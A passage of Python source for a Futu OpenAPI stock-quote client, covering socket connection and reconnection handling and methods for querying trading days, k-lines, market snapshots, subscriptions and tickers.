self._pre_handler_table = {
"6200": {"type": HKTradeOrderPreHandler, "obj": HKTradeOrderPreHandler()},
"7200": {"type": USTradeOrderPreHandler, "obj": USTradeOrderPreHandler()},
}
# self._pre_handler_table = self._handler_table.copy()
def set_pre_handler(self, handler):
'''pre handler push
return: ret_error or ret_ok
'''
set_flag = False
for protoc in self._pre_handler_table:
if isinstance(handler, self._pre_handler_table[protoc]["type"]):
self._pre_handler_table[protoc]["obj"] = handler
return RET_OK
if set_flag is False:
return RET_ERROR
def set_handler(self, handler):
"""
set the callback processing object to be used by the receiving thread after receiving the data.User should set
their own callback object setting in order to achieve event driven.
:param handler:the object in callback handler base
:return: ret_error or ret_ok
"""
set_flag = False
for protoc in self._handler_table:
if isinstance(handler, self._handler_table[protoc]["type"]):
self._handler_table[protoc]["obj"] = handler
return RET_OK
if set_flag is False:
return RET_ERROR
def recv_func(self, rsp_str):
"""receive response callback function"""
if self.cb_check_recv is not None and not self.cb_check_recv():
return
ret, msg, rsp = extract_pls_rsp(rsp_str)
if ret != RET_OK:
error_str = msg + rsp_str
print(error_str)
return
protoc_num = rsp["Protocol"]
handler = self._default_handler
pre_handler = None
if protoc_num in self._handler_table:
handler = self._handler_table[protoc_num]['obj']
if protoc_num in self._pre_handler_table:
pre_handler = self._pre_handler_table[protoc_num]['obj']
if pre_handler is not None:
pre_handler.on_recv_rsp(rsp_str)
ret, result = handler.on_recv_rsp(rsp_str)
if ret != RET_OK:
error_str = result
handler.on_error(error_str)
@staticmethod
def error_func(err_str):
"""error callback function"""
print(err_str)
class _SyncNetworkQueryCtx:
"""
Network query context manages connection between python program and FUTU client program.
Short (non-persistent) connection can be created by setting long_conn parameter False, which suggests that
TCP connection is closed once a query session finished
Long (persistent) connection can be created by setting long_conn parameter True, which suggests that TCP
connection is persisted after a query session finished, waiting for next query.
"""
def __init__(self, host, port, long_conn=True, connected_handler=None):
self.s = None
self.__host = host
self.__port = port
self.long_conn = long_conn
self._socket_lock = RLock()
self._connected_handler = connected_handler
self._is_loop_connecting = False
def close_socket(self):
"""close socket"""
self._socket_lock.acquire()
self._force_close_session()
self._socket_lock.release()
def is_sock_ok(self, timeout_select):
"""check if socket is OK"""
self._socket_lock.acquire()
try:
ret = self._is_socket_ok(timeout_select)
finally:
self._socket_lock.release()
return ret
def _is_socket_ok(self, timeout_select):
if not self.s:
return False
_, _, sel_except = select.select([self.s], [], [], timeout_select)
if self.s in sel_except:
return False
return True
def reconnect(self):
"""reconnect"""
self._socket_create_and_loop_connect()
def network_query(self, req_str):
"""
the function sends req_str to FUTU client and try to get response from the client.
:param req_str
:return: rsp_str
"""
try:
ret, msg = self._create_session()
self._socket_lock.acquire()
if ret != RET_OK:
return ret, msg, None
# rsp_str = ''
s_buf = str2binary(req_str)
s_cnt = self.s.send(s_buf)
rsp_buf = b''
while rsp_buf.find(b'\r\n\r\n') < 0:
try:
recv_buf = self.s.recv(5 * 1024 * 1024)
rsp_buf += recv_buf
if recv_buf == b'':
raise Exception("_SyncNetworkQueryCtx : remote server close")
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
error_str = ERROR_STR_PREFIX + str(
err) + ' when receiving after sending %s bytes. For req: ' % s_cnt + req_str
self._force_close_session()
return RET_ERROR, error_str, None
rsp_str = binary2str(rsp_buf)
self._close_session()
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
error_str = ERROR_STR_PREFIX + str(err) + ' when sending. For req: ' + req_str
self._force_close_session()
return RET_ERROR, error_str, None
finally:
self._socket_lock.release()
return RET_OK, "", rsp_str
def _socket_create_and_loop_connect(self):
self._socket_lock.acquire()
is_socket_lock = True
if self._is_loop_connecting:
return RET_ERROR, "is loop connecting, can't create_session"
self._is_loop_connecting = True
if self.s is not None:
self._force_close_session()
while True:
try:
if not is_socket_lock:
is_socket_lock = True
self._socket_lock.acquire()
s = sock.socket()
s.setsockopt(sock.SOL_SOCKET, sock.SO_REUSEADDR, 0)
s.setsockopt(sock.SOL_SOCKET, sock.SO_LINGER, pack("ii", 0, 0))
s.settimeout(10)
self.s = s
self.s.connect((self.__host, self.__port))
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
err_msg = ERROR_STR_PREFIX + str(err)
print("socket connect err:{}".format(err_msg))
self.s = None
if s:
s.close()
del s
sleep(1.5)
continue
if self._connected_handler is not None:
is_socket_lock = False
self._socket_lock.release()
sock_ok, is_retry = self._connected_handler.notify_sync_socket_connected(self)
if not sock_ok:
self._force_close_session()
if is_retry:
print("wait to connect futunn plugin server")
sleep(1.5)
continue
else:
return RET_ERROR, "obj is closed"
else:
break
self._is_loop_connecting = False
if is_socket_lock:
# is_socket_lock = False
self._socket_lock.release()
return RET_OK, ''
def _create_session(self):
if self.long_conn is True and self.s is not None:
return RET_OK, ""
ret, msg = self._socket_create_and_loop_connect()
if ret != RET_OK:
return ret, msg
return RET_OK, ""
def _force_close_session(self):
if self.s is None:
return
self.s.close()
del self.s
self.s = None
def _close_session(self):
if self.s is None or self.long_conn is True:
return
self.s.close()
self.s = None
def __del__(self):
if self.s is not None:
self.s.close()
self.s = None
class _AsyncThreadCtrl(object):
def __init__(self):
self.__list_aync = []
self.__net_proc = None
self.__stop = False
def add_async(self, async_obj):
if async_obj in self.__list_aync:
return
self.__list_aync.append(async_obj)
if self.__net_proc is None:
self.__stop = False
self.__net_proc = Thread(target=self._thread_aysnc_net_proc, args=())
self.__net_proc.start()
def remove_async(self, async_obj):
if async_obj not in self.__list_aync:
return
self.__list_aync.remove(async_obj)
if len(self.__list_aync) == 0:
self.__stop = True
self.__net_proc.join(timeout=5)
self.__net_proc = None
def _thread_aysnc_net_proc(self):
while not self.__stop:
asyncore.loop(timeout=0.001, count=5)
class _AsyncNetworkManager(asyncore.dispatcher_with_send):
async_thread_ctrl = _AsyncThreadCtrl()
def __init__(self, host, port, handler_ctx, close_handler=None):
self.__host = host
self.__port = port
self.__close_handler = close_handler
asyncore.dispatcher_with_send.__init__(self)
self._socket_create_and_connect()
time.sleep(0.1)
self.rsp_buf = b''
self.handler_ctx = handler_ctx
self.async_thread_ctrl.add_async(self)
def __del__(self):
self.async_thread_ctrl.remove_async(self)
def reconnect(self):
"""reconnect"""
self._socket_create_and_connect()
def close_socket(self):
"""close socket"""
self.async_thread_ctrl.remove_async(self)
self.close()
def handle_read(self):
"""
deal with Json package
:return: err
"""
delimiter = b'\r\n\r\n'
rsp_str = u''
try:
recv_buf = self.recv(5 * 1024 * 1024)
if recv_buf == b'':
raise Exception("_AsyncNetworkManager : remote server close")
self.rsp_buf += recv_buf
loc = self.rsp_buf.find(delimiter)
while loc >= 0:
rsp_binary = self.rsp_buf[0:loc]
loc += len(delimiter)
self.rsp_buf = self.rsp_buf[loc:]
rsp_str = binary2str(rsp_binary)
self.handler_ctx.recv_func(rsp_str)
loc = self.rsp_buf.find(delimiter)
except Exception as e:
if isinstance(e, IOError) and e.errno == 10035:
return
traceback.print_exc()
err = sys.exc_info()[1]
self.handler_ctx.error_func(str(err))
print(rsp_str)
return
def network_query(self, req_str):
"""query network status"""
s_buf = str2binary(req_str)
self.send(s_buf)
def __del__(self):
self.close()
def handle_close(self):
"""handle close"""
if self.__close_handler is not None:
self.__close_handler.notify_async_socket_close(self)
def _socket_create_and_connect(self):
if self.socket is not None:
self.close()
if self.__host is not None and self.__port is not None:
self.create_socket(sock.AF_INET, sock.SOCK_STREAM)
self.connect((self.__host, self.__port))
class OpenContextBase(object):
"""Base class for set context"""
metaclass__ = ABCMeta
def __init__(self, host, port, sync_enable, async_enable):
self.__host = host
self.__port = port
self.__sync_socket_enable = sync_enable
self.__async_socket_enable = async_enable
self._async_ctx = None
self._sync_net_ctx = None
self._thread_check_sync_sock = None
self._thread_is_exit = False
self._check_last_req_time = None
self._is_socket_reconnecting = False
self._is_obj_closed = False
self._handlers_ctx = None
self._proc_run = False
self._sync_query_lock = RLock()
self._count_reconnect = 0
if not self.__sync_socket_enable and not self.__async_socket_enable:
raise Exception('you should specify at least one socket type to create !')
self._socket_reconnect_and_wait_ready()
def __del__(self):
self._close()
@abstractmethod
def close(self):
"""
to call close old obj before loop create new, otherwise socket will encounter error 10053 or more!
"""
self._close()
@abstractmethod
def on_api_socket_reconnected(self):
"""
callback after reconnect ok
"""
# print("on_api_socket_reconnected obj ID={}".format(id(self)))
pass
def _close(self):
self._is_obj_closed = True
self.stop()
if self._thread_check_sync_sock is not None:
self._thread_check_sync_sock.join(timeout=10)
self._thread_check_sync_sock = None
assert self._thread_is_exit
if self._sync_net_ctx is not None:
self._sync_net_ctx.close_socket()
self._sync_net_ctx = None
if self._async_ctx is not None:
self._async_ctx.close_socket()
self._async_ctx = None
if self._sync_query_lock is not None:
self._sync_query_lock = None
self._handlers_ctx = None
def start(self):
"""
start the receiving thread,asynchronously receive the data pushed by the client
"""
self._proc_run = True
def stop(self):
"""
stop the receiving thread, no longer receive the data pushed by the client
"""
self._proc_run = False
def set_handler(self, handler):
"""
set async push hander obj
:param handler: RspHandlerBase deviced obj
:return: ret_error or ret_ok
"""
if self._handlers_ctx is not None:
return self._handlers_ctx.set_handler(handler)
return RET_ERROR
def set_pre_handler(self, handler):
'''set pre handler'''
if self._handlers_ctx is not None:
return self._handlers_ctx.set_pre_handler(handler)
return RET_ERROR
def get_global_state(self):
"""
get api server(exe) global state
:return: RET_OK, state_dict | err_code, msg
"""
query_processor = self._get_sync_query_processor(GlobalStateQuery.pack_req,
GlobalStateQuery.unpack_rsp)
kargs = {"state_type": 0}
ret_code, msg, state_dict = query_processor(**kargs)
if ret_code != RET_OK:
return ret_code, msg
return RET_OK, state_dict
def _is_proc_run(self):
return self._proc_run
def _send_sync_req(self, req_str):
"""
send a synchronous request
"""
ret, msg, content = self._sync_net_ctx.network_query(req_str)
if ret != RET_OK:
return RET_ERROR, msg, None
return RET_OK, msg, content
def _send_async_req(self, req_str):
"""
send a asynchronous request
"""
if self._async_ctx:
self._async_ctx.send(req_str)
return RET_OK, ''
return RET_ERROR, 'async_ctx is None!'
def _get_sync_query_processor(self, pack_func, unpack_func):
"""
synchronize the query processor
:param pack_func: back
:param unpack_func: unpack
:return: sync_query_processor
"""
send_req = self._send_sync_req
def sync_query_processor(**kargs):
"""sync query processor"""
msg_obj_del = "the object may have been deleted!"
if self._is_obj_closed or self._sync_query_lock is None:
return RET_ERROR, msg_obj_del, None
try:
self._sync_query_lock.acquire()
if self._is_obj_closed:
return RET_ERROR, msg_obj_del, None
ret_code, msg, req_str = pack_func(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg, None
ret_code, msg, rsp_str = send_req(req_str)
if ret_code == RET_ERROR:
return ret_code, msg, None
ret_code, msg, content = unpack_func(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg, None
return RET_OK, msg, content
finally:
try:
if self._sync_query_lock:
self._sync_query_lock.release()
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
print(err)
return sync_query_processor
def _socket_reconnect_and_wait_ready(self):
"""
sync_socket & async_socket recreate
:return: None
"""
if self._is_socket_reconnecting or self._is_obj_closed or self._sync_query_lock is None:
return
self._count_reconnect += 1
# print("_socket_reconnect_and_wait_ready - count = %s" % self._count_reconnect)
try:
self._is_socket_reconnecting = True
self._sync_query_lock.acquire()
# create async socket (for push data)
if self.__async_socket_enable:
if self._async_ctx is None:
self._handlers_ctx = HandlerContext(self._is_proc_run)
self._async_ctx = _AsyncNetworkManager(self.__host, self.__port, self._handlers_ctx, self)
else:
self._async_ctx.reconnect()
# create sync socket and loop wait to connect api server
if self.__sync_socket_enable:
self._thread_check_sync_sock = None
if self._sync_net_ctx is None:
self._sync_net_ctx = _SyncNetworkQueryCtx(self.__host, self.__port,
long_conn=True, connected_handler=self)
self._sync_net_ctx.reconnect()
# notify reconnected
self.on_api_socket_reconnected()
# run thread to check sync socket state
if self.__sync_socket_enable:
self._thread_check_sync_sock = Thread(target=self._thread_check_sync_sock_fun)
self._thread_check_sync_sock.setDaemon(True)
self._thread_check_sync_sock.start()
finally:
try:
self._is_socket_reconnecting = False
if self._sync_query_lock:
self._sync_query_lock.release()
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
print(err)
def notify_sync_socket_connected(self, sync_ctxt):
"""
:param sync_ctxt:
:return: (is_socket_ok[bool], is_to_retry_connect[bool])
"""
if self._is_obj_closed or self._sync_net_ctx is None or self._sync_net_ctx is not sync_ctxt:
return False, False
is_ready = False
ret_code, state_dict = self.get_global_state()
if ret_code == 0:
is_ready = int(state_dict['Quote_Logined']) != 0 and int(state_dict['Trade_Logined']) != 0
# 检查版本是否匹配
if is_ready:
cur_ver = state_dict['Version']
if cur_ver < NN_VERSION_MIN:
str_ver = cur_ver if cur_ver else str('未知')
str_error = "API连接的客户端版本过低, 当前版本:\'%s\', 最低要求版本:\'%s\', 请联系管理员重新安装牛牛API客户端!" %(str_ver, NN_VERSION_MIN)
raise Exception(str_error)
return is_ready, True
def notify_async_socket_close(self, async_ctx):
"""
AsyncNetworkManager onclose callback
"""
if self._is_obj_closed or self._async_ctx is None or async_ctx is not self._async_ctx:
return
# auto reconnect
self._socket_reconnect_and_wait_ready()
def _thread_check_sync_sock_fun(self):
"""
thread fun : timer to check socket state
"""
thread_handle = self._thread_check_sync_sock
while True:
if self._thread_check_sync_sock is not thread_handle:
if self._thread_check_sync_sock is None:
self._thread_is_exit = True
print ('check_sync_sock thread : exit by obj changed...')
return
if self._is_obj_closed:
self._thread_is_exit = True
return
sync_net_ctx = self._sync_net_ctx
if sync_net_ctx is None:
self._thread_is_exit = True
return
# select sock to get err state
if not sync_net_ctx.is_sock_ok(0.01):
self._thread_is_exit = True
if self._thread_check_sync_sock is thread_handle and not self._is_obj_closed:
print("check_sync_sock thread : reconnect !")
self._socket_reconnect_and_wait_ready()
return
else:
sleep(0.1)
# send req loop per 10 seconds
cur_time = time.time()
if (self._check_last_req_time is None) or (cur_time - self._check_last_req_time > 10):
self._check_last_req_time = cur_time
if self._thread_check_sync_sock is thread_handle:
self.get_global_state()
class OpenQuoteContext(OpenContextBase):
"""Class for set context of stock quote"""
def __init__(self, host='127.0.0.1', port=11111):
self._ctx_subscribe = set()
super(OpenQuoteContext, self).__init__(host, port, True, True)
def close(self):
"""
to call close old obj before loop create new, otherwise socket will encounter erro 10053 or more!
"""
super(OpenQuoteContext, self).close()
def on_api_socket_reconnected(self):
"""for API socket reconnected"""
# auto subscribe
set_sub = self._ctx_subscribe.copy()
for (stock_code, data_type, push) in set_sub:
for i in range(3):
ret, _ = self.subscribe(stock_code, data_type, push)
if ret == 0:
break
else:
sleep(1)
def get_trading_days(self, market, start_date=None, end_date=None):
"""get the trading days"""
if market is None or is_str(market) is False:
error_str = ERROR_STR_PREFIX + "the type of market param is wrong"
return RET_ERROR, error_str
if start_date is not None and is_str(start_date) is False:
error_str = ERROR_STR_PREFIX + "the type of start_date param is wrong"
return RET_ERROR, error_str
if end_date is not None and is_str(end_date) is False:
error_str = ERROR_STR_PREFIX + "the type of end_date param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(TradeDayQuery.pack_req,
TradeDayQuery.unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'market': market, 'start_date': start_date, "end_date": end_date}
ret_code, msg, trade_day_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
return RET_OK, trade_day_list
def get_stock_basicinfo(self, market, stock_type='STOCK'):
"""get the basic information of stock"""
param_table = {'market': market, 'stock_type': stock_type}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(StockBasicInfoQuery.pack_req,
StockBasicInfoQuery.unpack_rsp)
kargs = {"market": market, 'stock_type': stock_type}
ret_code, msg, basic_info_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'name', 'lot_size', 'stock_type', 'stock_child_type', "owner_stock_code", "listing_date",
"stockid"]
basic_info_table = pd.DataFrame(basic_info_list, columns=col_list)
return RET_OK, basic_info_table
def get_multiple_history_kline(self, codelist, start=None, end=None, ktype='K_DAY', autype='qfq'):
if is_str(codelist):
codelist = codelist.split(',')
elif isinstance(codelist, list):
pass
else:
raise Exception("code list must be like ['HK.00001', 'HK.00700'] or 'HK.00001,HK.00700'")
result = []
for code in codelist:
ret, data = self.get_history_kline(code, start, end, ktype, autype)
if ret != RET_OK:
raise Exception('get history kline error {},{},{},{}'.format(code, start, end, ktype))
result.append(data)
return 0, result
def get_history_kline(self, code, start=None, end=None, ktype='K_DAY', autype='qfq', fields=[KL_FIELD.ALL]):
'''
得到本地历史k线,需先参照帮助文档下载k线
:param code: 股票code
:param start: 开始时间 '%Y-%m-%d'
:param end: 结束时间 '%Y-%m-%d'
:param ktype: k线类型, 参见 KTYPE_MAP 定义 'K_1M' 'K_DAY'...
:param autype: 复权类型, 参见 AUTYPE_MAP 定义 'None', 'qfq', 'hfq'
:param fields: 需返回的字段列表,参见 KL_FIELD 定义 KL_FIELD.ALL KL_FIELD.OPEN ....
:return: (ret, data) ret == 0 返回pd dataframe数据,表头包括'code', 'time_key', 'open', 'close', 'high', 'low',
'volume', 'turnover', 'pe_ratio', 'turnover_rate' 'change_rate'
ret != 0 返回错误字符串
'''
"""get the historic Kline data"""
if start is not None and is_str(start) is False:
error_str = ERROR_STR_PREFIX + "the type of start param is wrong"
return RET_ERROR, error_str
if end is not None and is_str(end) is False:
error_str = ERROR_STR_PREFIX + "the type of end param is wrong"
return RET_ERROR, error_str
req_fields = unique_and_normalize_list(fields)
if not fields:
req_fields = copy(KL_FIELD.ALL_REAL)
req_fields = KL_FIELD.normalize_field_list(req_fields)
if not req_fields:
error_str = ERROR_STR_PREFIX + "the type of fields param is wrong"
return RET_ERROR, error_str
if autype is None:
autype = 'None'
param_table = {'code': code, 'ktype': ktype, 'autype': autype}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
req_start = start
max_kl_num = 1000
data_finish = False
list_ret = []
# 循环请求数据,避免一次性取太多超时
while not data_finish:
kargs = {"stock_str": code, "start_date": req_start, "end_date": end, "ktype": ktype, "autype": autype, "fields": req_fields, "max_num": max_kl_num}
query_processor = self._get_sync_query_processor(HistoryKlineQuery.pack_req,
HistoryKlineQuery.unpack_rsp)
ret_code, msg, content = query_processor(**kargs)
if ret_code != RET_OK:
return ret_code, msg
list_kline, has_next, next_time = content
data_finish = (not has_next) or (not next_time)
req_start = next_time
for dict_item in list_kline:
list_ret.append(dict_item)
# 表头列
col_list = ['code']
for field in req_fields:
str_field = KL_FIELD.DICT_KL_FIELD_STR[field]
if str_field not in col_list:
col_list.append(str_field)
kline_frame_table = pd.DataFrame(list_ret, columns=col_list)
return RET_OK, kline_frame_table
def get_autype_list(self, code_list):
"""get the autype list"""
if code_list is None or isinstance(code_list, list) is False:
error_str = ERROR_STR_PREFIX + "the type of code_list param is wrong"
return RET_ERROR, error_str
for code in code_list:
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of param in code_list is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(ExrightQuery.pack_req,
ExrightQuery.unpack_rsp)
kargs = {"stock_list": code_list}
ret_code, msg, exr_record = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code',
'ex_div_date',
'split_ratio',
'per_cash_div',
'per_share_div_ratio',
'per_share_trans_ratio',
'allotment_ratio',
'allotment_price',
'stk_spo_ratio',
'stk_spo_price',
'forward_adj_factorA',
'forward_adj_factorB',
'backward_adj_factorA',
'backward_adj_factorB']
exr_frame_table = pd.DataFrame(exr_record, columns=col_list)
return RET_OK, exr_frame_table
def get_market_snapshot(self, code_list):
"""get teh market snapshot"""
code_list = unique_and_normalize_list(code_list)
if not code_list:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(MarketSnapshotQuery.pack_req,
MarketSnapshotQuery.unpack_rsp)
kargs = {"stock_list": code_list}
ret_code, msg, snapshot_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'update_time', 'last_price', 'open_price',
'high_price', 'low_price', 'prev_close_price',
'volume', 'turnover', 'turnover_rate', 'suspension', 'listing_date',
'circular_market_val', 'total_market_val', 'wrt_valid',
'wrt_conversion_ratio', 'wrt_type', 'wrt_strike_price',
'wrt_maturity_date', 'wrt_end_trade', 'wrt_code',
'wrt_recovery_price', 'wrt_street_vol', 'wrt_issue_vol',
'wrt_street_ratio', 'wrt_delta', 'wrt_implied_volatility', 'wrt_premium', 'lot_size',
# 2017.11.6 add
'issued_shares', 'net_asset', 'net_profit', 'earning_per_share',
'outstanding_shares', 'net_asset_per_share', 'ey_ratio', 'pe_ratio', 'pb_ratio',
# 2017.1.25 add
'price_spread',
]
snapshot_frame_table = pd.DataFrame(snapshot_list, columns=col_list)
return RET_OK, snapshot_frame_table
def get_rt_data(self, code):
"""get real-time data"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of param in code is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(RtDataQuery.pack_req,
RtDataQuery.unpack_rsp)
kargs = {"stock_str": code}
ret_code, msg, rt_data_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'time', 'data_status', 'opened_mins', 'cur_price', 'last_close',
'avg_price', 'volume', 'turnover']
rt_data_table = pd.DataFrame(rt_data_list, columns=col_list)
return RET_OK, rt_data_table
def get_plate_list(self, market, plate_class):
"""get stock list of the given plate"""
param_table = {'market': market, 'plate_class': plate_class}
for x in param_table:
param = param_table[x]
if param is None or is_str(market) is False:
error_str = ERROR_STR_PREFIX + "the type of market param is wrong"
return RET_ERROR, error_str
if market not in MKT_MAP:
error_str = ERROR_STR_PREFIX + "the value of market param is wrong "
return RET_ERROR, error_str
if plate_class not in PLATE_CLASS_MAP:
error_str = ERROR_STR_PREFIX + "the class of plate is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SubplateQuery.pack_req,
SubplateQuery.unpack_rsp)
kargs = {'market': market, 'plate_class': plate_class}
ret_code, msg, subplate_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'plate_name', 'plate_id']
subplate_frame_table = pd.DataFrame(subplate_list, columns=col_list)
return RET_OK, subplate_frame_table
def get_plate_stock(self, plate_code):
"""get the stock of the given plate"""
if plate_code is None or is_str(plate_code) is False:
error_str = ERROR_STR_PREFIX + "the type of stock_code is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(PlateStockQuery.pack_req,
PlateStockQuery.unpack_rsp)
kargs = {"plate_code": plate_code}
ret_code, msg, plate_stock_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'lot_size', 'stock_name', 'owner_market', 'stock_child_type', 'stock_type']
plate_stock_table = pd.DataFrame(plate_stock_list, columns=col_list)
return RET_OK, plate_stock_table
def get_broker_queue(self, code):
"""get teh queue of the broker"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of param in code is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(BrokerQueueQuery.pack_req,
BrokerQueueQuery.unpack_rsp)
kargs = {"stock_str": code}
ret_code, bid_list, ask_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, ERROR_STR_PREFIX, EMPTY_STRING
col_bid_list = ['code', 'bid_broker_id', 'bid_broker_name', 'bid_broker_pos']
col_ask_list = ['code', 'ask_broker_id', 'ask_broker_name', 'ask_broker_pos']
bid_frame_table = pd.DataFrame(bid_list, columns=col_bid_list)
sak_frame_table = pd.DataFrame(ask_list, columns=col_ask_list)
return RET_OK, bid_frame_table, sak_frame_table
def subscribe(self, stock_code, data_type, push=False):
"""
subscribe a sort of data for a stock
:param stock_code: string stock_code . For instance, "HK.00700", "US.AAPL"
:param data_type: string data type. For instance, "K_1M", "K_MON"
:param push: push option
:return: (ret_code, ret_data). ret_code: RET_OK or RET_ERROR.
"""
param_table = {'stock_code': stock_code, 'data_type': data_type}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SubscriptionQuery.pack_subscribe_req,
SubscriptionQuery.unpack_subscribe_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'stock_str': stock_code, 'data_type': data_type}
ret_code, msg, _ = query_processor(**kargs)
# update subscribe context info
sub_obj = (str(stock_code), str(data_type), bool(push))
self._ctx_subscribe.add(sub_obj)
if ret_code != RET_OK:
return RET_ERROR, msg
if push:
ret_code, msg, push_req_str = SubscriptionQuery.pack_push_req(stock_code, data_type)
if ret_code != RET_OK:
return RET_ERROR, msg
ret_code, msg = self._send_async_req(push_req_str)
if ret_code != RET_OK:
return RET_ERROR, msg
return RET_OK, None
def unsubscribe(self, stock_code, data_type, unpush=True):
"""
unsubcribe a sort of data for a stock
:param stock_code: string stock_code . For instance, "HK.00700", "US.AAPL"
:param data_type: string data type. For instance, "K_1M", "K_MON"
:param unpush: bool
:return: (ret_code, ret_data). ret_code: RET_OK or RET_ERROR.
"""
param_table = {'stock_code': stock_code, 'data_type': data_type}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SubscriptionQuery.pack_unsubscribe_req,
SubscriptionQuery.unpack_unsubscribe_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'stock_str': stock_code, 'data_type': data_type}
# update subscribe context info
unsub_obj1 = (str(stock_code), str(data_type), True)
unsub_obj2 = (str(stock_code), str(data_type), False)
if unsub_obj1 in self._ctx_subscribe:
self._ctx_subscribe.remove(unsub_obj1)
if unsub_obj2 in self._ctx_subscribe:
self._ctx_subscribe.remove(unsub_obj2)
ret_code, msg, _ = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
if unpush:
ret_code, msg, unpush_req_str = SubscriptionQuery.pack_unpush_req(stock_code, data_type)
if ret_code != RET_OK:
return RET_ERROR, msg
ret_code, msg = self._send_async_req(unpush_req_str)
if ret_code != RET_OK:
return RET_ERROR, msg
return RET_OK, None
def query_subscription(self, query=0):
"""
get the current subscription table
:return:
"""
query_processor = self._get_sync_query_processor(SubscriptionQuery.pack_subscription_query_req,
SubscriptionQuery.unpack_subscription_query_rsp)
kargs = {"query": query}
ret_code, msg, subscription_table = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
return RET_OK, subscription_table
def get_stock_quote(self, code_list):
"""
:param code_list:
:return: DataFrame of quote data
Usage:
After subcribe "QUOTE" type for given stock codes, invoke
get_stock_quote to obtain the data
"""
code_list = unique_and_normalize_list(code_list)
if not code_list:
error_str = ERROR_STR_PREFIX + "the type of code_list param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(StockQuoteQuery.pack_req,
StockQuoteQuery.unpack_rsp,
)
kargs = {"stock_list": code_list}
ret_code, msg, quote_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'data_date', 'data_time', 'last_price', 'open_price',
'high_price', 'low_price', 'prev_close_price',
'volume', 'turnover', 'turnover_rate', 'amplitude', 'suspension', 'listing_date', 'price_spread'
]
quote_frame_table = pd.DataFrame(quote_list, columns=col_list)
return RET_OK, quote_frame_table
def get_rt_ticker(self, code, num=500):
"""
get transaction information
:param code: stock code
:param num: the default is 500
:return: (ret_ok, ticker_frame_table)
"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
if num is None or isinstance(num, int) is False:
error_str = ERROR_STR_PREFIX + "the type of num param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(TickerQuery.pack_req,
TickerQuery.unpack_rsp,
)
kargs = {"stock_str": code, "num": num}
ret_code, msg, ticker_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'time', 'price', 'volume', 'turnover', "ticker_direction", 'sequence']
ticker_frame_table = pd.DataFrame(ticker_list, columns=col_list)
return RET_OK, ticker_frame_table
def get_cur_kline(self, code, num, ktype='K_DAY', autype='qfq'):
"""
get current kline
:param code: stock code
:param num:
:param ktype: the type of kline
:param autype:
:return:
"""
param_table = {'code': code, 'ktype': ktype}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
if num is None or isinstance(num, int) is False:
error_str = ERROR_STR_PREFIX + "the type of num param is wrong"
return RET_ERROR, error_str
if autype is not None and is_str(autype) is False:
error_str = ERROR_STR_PREFIX + "the type of autype param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(CurKlineQuery.pack_req,
CurKlineQuery.unpack_rsp,
)
kargs = {"stock_str": code, "num": num, "ktype": ktype, "autype": autype}
ret_code, msg, kline_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'time_key', 'open', 'close', 'high', 'low', 'volume', 'turnover', 'pe_ratio', 'turnover_rate']
kline_frame_table = pd.DataFrame(kline_list, columns=col_list)
return RET_OK, kline_frame_table
def get_order_book(self, code):
"""get the order book data"""
if code is None or is_str(code) is False:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
